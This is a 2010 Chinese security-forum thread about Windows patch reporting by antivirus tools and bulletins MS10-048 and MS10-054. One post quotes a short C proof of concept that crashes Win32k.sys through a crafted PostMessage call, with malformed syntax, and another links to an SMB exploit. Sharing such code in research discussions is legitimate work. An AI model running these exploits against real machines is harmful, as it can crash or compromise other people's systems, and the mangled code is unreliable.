楼主: iippuiui
收起左侧

妈呀,数字是想害死哥么?(阴mou已被真相了) 哇哈哈

   关闭 [复制链接]
紫陈
发表于 2010-8-12 00:26:01 | 显示全部楼层
回复 16楼 jinzijie  的帖子

犀利
   
魍魉
发表于 2010-8-12 00:33:16 | 显示全部楼层
LZ淡定,通常别人比较360卫士、金山卫士和QQ管家的时候专门注明不比较漏洞修复...因为这个与微软官方的更新有出入..
pop0762
发表于 2010-8-12 00:45:08 | 显示全部楼层
LZ你有没更新360木马库啊,我今天晚上才收到了这几个漏洞的信息。
Dreamer
发表于 2010-8-12 00:53:59 | 显示全部楼层
真相帝何在
这个素真的么?
小言。
发表于 2010-8-12 00:54:23 | 显示全部楼层
真相帝何在
这个素真的么?
Dreamer 发表于 2010.8.12 00:53


在思过崖
Lgwu
头像被屏蔽
发表于 2010-8-12 01:11:46 | 显示全部楼层
回复 16楼 jinzijie  的帖子

刚回到卡饭就看到你在这里犀利了。在sebug发现个东东,MJ的代码?
  1. SEBUG-ID:20031
  2. SEBUG-Appdir:Microsoft Windows
  3. 发布时间:2010-08-10
  4. 测试方法:
  5. [www.sebug.net]
  6. 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  7. # Source: http://www.securityfocus.com/bid/39630/info

  8. Microsoft Windows is prone to a local privilege-escalation vulnerability.

  9. A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.

  10. Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue.

  11. # Include "stdafx.h"
  12. # Include "windows.h"
  13. int main (int argc, char * argv [])
  14. (
  15. printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
  16. getchar();
  17. HWND hwnd = FindWindow ("DDEMLEvent", NULL);
  18. if (hwnd == 0)
  19. (
  20.    printf ("cannot find DDEMLEvent Window! \ n");
  21.    return 0;
  22. )
  23. PostMessage (hwnd, 0x4c, 0x4, 0x80000000);  
  24. return 0;
  25. )
复制代码
jinzijie
发表于 2010-8-12 01:20:51 | 显示全部楼层
回复

刚回到卡饭就看到你在这里犀利了。在sebug发现个东东,MJ的代码?
Lgwu 发表于 2010.8.12 01:11



乃这么犀利
Lgwu
头像被屏蔽
发表于 2010-8-12 01:29:24 | 显示全部楼层
乃这么犀利
jinzijie 发表于 2010.8.12 01:20


是MJ犀利。针对刚刚修复的KB2160329 漏洞的,本地提权测试代码。

公告ID:MS10-048
知识库编号:KB2160329
修复漏洞详情:修复Windows内核模式驱动中一个公开披露、四个秘密报告的漏洞,其中最严重的会在攻击者本地登陆、运行特制程序的时候引起权限提升,但无法远程或者匿名利用。
最高安全等级:严重
涉及软件:Windows XP以来的所有系统
jinzijie
发表于 2010-8-12 01:31:17 | 显示全部楼层
是MJ犀利。针对刚刚修复的KB2160329 漏洞的,本地提权测试代码。

公告ID:MS10-048
知识库编 ...
Lgwu 发表于 2010.8.12 01:29

博客上没看到,不过看到by mj0011

Lgwu
头像被屏蔽
发表于 2010-8-12 01:37:48 | 显示全部楼层
回复 29楼 jinzijie  的帖子

相对来说,貌似MS10-054更严重。从漏洞描述看,可能会导致远程代码执行。
SMB 内核服务上以前就出现过大问题了。呵呵。有poc,找工具编译下看看。
http://sebug.net/exploit/20029/
   
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 22:26 , Processed in 0.098658 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表